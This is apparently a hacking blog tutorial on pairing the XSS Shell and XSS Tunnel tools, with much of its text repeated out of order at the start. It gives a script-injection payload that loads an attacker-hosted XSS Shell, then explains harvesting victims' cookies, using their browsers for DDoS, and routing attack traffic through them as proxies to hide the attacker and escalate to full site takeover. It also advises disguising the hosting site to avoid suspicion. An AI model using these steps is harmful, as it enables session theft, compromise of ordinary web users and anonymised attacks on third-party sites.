NOTE: on my host in this test run the “DB” folder was changed to “Db” and the “admin” folder was changed to “Admin”, so you may need to alter your scripts after uploading, just play with it a bit until it works for you. Also note you might need to alter scripts to align as well since your URL path may be case sensitive to match what control panel reflects, like in my case.

Now that you have everything uploaded it is time to navigate to the admin panel, you should be able to find it easily at:


 

You will login with whatever password you set originally in the xssshell.asp file. Once you login you are greeted with the XSS Shell admin panel.


OK, so things work now to get some victims… If you want to test it out real quick you can upload the Sample_Victim folder that comes with XSS Shell download. Just edit the code in the middle of page (comments point it out) and change to point to your new XSS Shell setup. Once completed, open up another browser and navigate to the /Sample_Victim/Default.asp page to activate. Alternatively you can get straight to work by injecting a form of this script into XSS vulnerable site and then getting victims to visit:
"><script src="http://yoursite.com/xssshellifany/xssshell.asp"></script>

When you get victims they will appear in the XSS Shell Admin Panel, like so:

 

From here you can grab victim cookies, send alert boxes to all victims as once, use victim browsers for DDoS, etc. If you are good with JavaScript you can do whatever your skills are limited to as you can add in your own custom commands and payloads rather easily under the eval(js) module section. If you want to know more about XSS Shell then please refer to the developers site as I will now be jumping onward into how we can utilize the XSS Shell with XSS tunnel to create a Zombie bot for further attacking, exploiting, whatever….

XSS Shell homepage can be found here, and download includes both XSS Shell and XSS Tunnel:  http://labs.portcullis.co.uk/application/xssshell/

OK, now that we have XSS Shell successfully setup we can extend its usefulness even further through the help of another tool called XSS Tunnel. This is a binary program made strictly for Windows. You simply need to download and open and configure to use our XSS Shell to then route all traffic we want using our XSS Shell victims as proxies. This can allow us to bypass IP restrictions should we grab an admin victim, which can then lead to further privilege escalations from the site admin panel. It also means we can turn our victims into Zombies and configure our favorite injection scanners, browsers, etc to use the Zombie victim as a proxy, meaning all logs on any servers we attack while connected will reflect our Zombies information and not ours adding yet another layer of stealth to our future exploitations.

Here is quick run through of the XSS Tunnel configuration. Double click file to run and you’re greeted with this:


We will need to click on the “OPTIONS” tab to enter our details for connecting to XSS Shell. Simply enter in the URL path to your XSS Shell Admin panel, and then enter the password you created for XSS Shell Admin Panel (xssshell.asp file stores the password if you already forgot).



You can hit the “TEST SERVER” button once you entered the correct details to check and confirm it is properly communicating with our XSS Shell. Upon success you will see message like so:




Now once you get victims in your XSS Shell you can use them as proxies for your favorite tools and/or to bypass site restrictions for further exploitation on the site where the original XSS flaw may have been found. In order to does this choose the interface or adapter you want to listen on and then choose the desired port to listen on and use for proxy functions. If you have something running on 8080 already then just changes it to meet your need. Transparency setting is purely for the XSS Tunnel GUI and nothing related to proxy function. Once you have it how you want you can click on the “START XSS TUNNEL” button near the top section, once you then enable the proxy function with your tools you will begin to see the requests flow through the main tab (if you care to watch or review).


This method can take a common non-persistent or persistent XSS vulnerability and turn it into a full site takeover proving that XSS is not something to be simply overlooked.

Hope you liked diz if u have any problem u can ask in comments :)

XSS Attack - Part 5

TAKING COMMON XSS VULNERABILITIES TO THE NEXT LEVEL


Hey awl 2oday I will tell  you two neat tools which can be used to leverage common XSS vulnerabilities and allow you to take them to the next level. There are a lot of admins and general techies who don't think XSS vulnerabilities are anything to be concerned about. What can a simple alert box do? Hopefully after today you will look at your code a little harder and have a little more respect for all those pesky XSS finds. This is based on my recent experience in setting these up and seeing the results in real time which lead me to feel the need to share this. Here we go

Things you need



XSS Shell & XSS Tunnel, both available here in single download

Path Disclosure Script, available here



Create an account at any of your favorite ASP hosting sites, usually a free one will do. Now create and upload a index file to have something for quick checks to see if anything is there (and to throw off suspicion) so your site seems legit. Now we will upload the Path Disclosure Script you downloaded above (path.asp) and then navigate in our browser to it in order to find out what our default install path is so we can setup our db.asp file for connections to our MS-ACCESS database file.



Write down what you see on the screen, remove file, and then go and edit the db.asp for XSS Shell for the following line of code, change path to what you found above:
'// DATABASE CONFIGURATION
Const DBPATH = "X:\path\to\site\install”

 Once that is done, create a zip file for all of the content in our XSS Shell folder and name it SSX.zip. Then use your control panel features to unzip the content to speed up XSS Shell site build-out (otherwise it takes forever to upload one by one). 





Remove the .zip file and the path finder script to clean things up, so it should look something like this once done:

NOTE: on my host in this test run the “DB” folder was changed to “Db” and the “admin” folder was changed to “Admin”, so you may need to alter your scripts after uploading, just play with it a bit until it works for you. Also note you might need to alter scripts to align as well since your URL path may be case sensitive to match what control panel reflects, like in my case.

Now that you have everything uploaded it is time to navigate to the admin panel, you should be able to find it easily at:


 

You will login with whatever password you set originally in the xssshell.asp file. Once you login you are greeted with the XSS Shell admin panel.


OK, so things work now to get some victims… If you want to test it out real quick you can upload the Sample_Victim folder that comes with XSS Shell download. Just edit the code in the middle of page (comments point it out) and change to point to your new XSS Shell setup. Once completed, open up another browser and navigate to the /Sample_Victim/Default.asp page to activate. Alternatively you can get straight to work by injecting a form of this script into XSS vulnerable site and then getting victims to visit:
"><script src="http://yoursite.com/xssshellifany/xssshell.asp"></script>

When you get victims they will appear in the XSS Shell Admin Panel, like so:

 

From here you can grab victim cookies, send alert boxes to all victims as once, use victim browsers for DDoS, etc. If you are good with JavaScript you can do whatever your skills are limited to as you can add in your own custom commands and payloads rather easily under the eval(js) module section. If you want to know more about XSS Shell then please refer to the developers site as I will now be jumping onward into how we can utilize the XSS Shell with XSS tunnel to create a Zombie bot for further attacking, exploiting, whatever….

XSS Shell homepage can be found here, and download includes both XSS Shell and XSS Tunnel:  http://labs.portcullis.co.uk/application/xssshell/

OK, now that we have XSS Shell successfully setup we can extend its usefulness even further through the help of another tool called XSS Tunnel. This is a binary program made strictly for Windows. You simply need to download and open and configure to use our XSS Shell to then route all traffic we want using our XSS Shell victims as proxies. This can allow us to bypass IP restrictions should we grab an admin victim, which can then lead to further privilege escalations from the site admin panel. It also means we can turn our victims into Zombies and configure our favorite injection scanners, browsers, etc to use the Zombie victim as a proxy, meaning all logs on any servers we attack while connected will reflect our Zombies information and not ours adding yet another layer of stealth to our future exploitations.

Here is quick run through of the XSS Tunnel configuration. Double click file to run and you’re greeted with this:


We will need to click on the “OPTIONS” tab to enter our details for connecting to XSS Shell. Simply enter in the URL path to your XSS Shell Admin panel, and then enter the password you created for XSS Shell Admin Panel (xssshell.asp file stores the password if you already forgot).



You can hit the “TEST SERVER” button once you entered the correct details to check and confirm it is properly communicating with our XSS Shell. Upon success you will see message like so:




Now once you get victims in your XSS Shell you can use them as proxies for your favorite tools and/or to bypass site restrictions for further exploitation on the site where the original XSS flaw may have been found. In order to does this choose the interface or adapter you want to listen on and then choose the desired port to listen on and use for proxy functions. If you have something running on 8080 already then just changes it to meet your need. Transparency setting is purely for the XSS Tunnel GUI and nothing related to proxy function. Once you have it how you want you can click on the “START XSS TUNNEL” button near the top section, once you then enable the proxy function with your tools you will begin to see the requests flow through the main tab (if you care to watch or review).


This method can take a common non-persistent or persistent XSS vulnerability and turn it into a full site takeover proving that XSS is not something to be simply overlooked.

Hope you liked diz if u have any problem u can ask in comments :)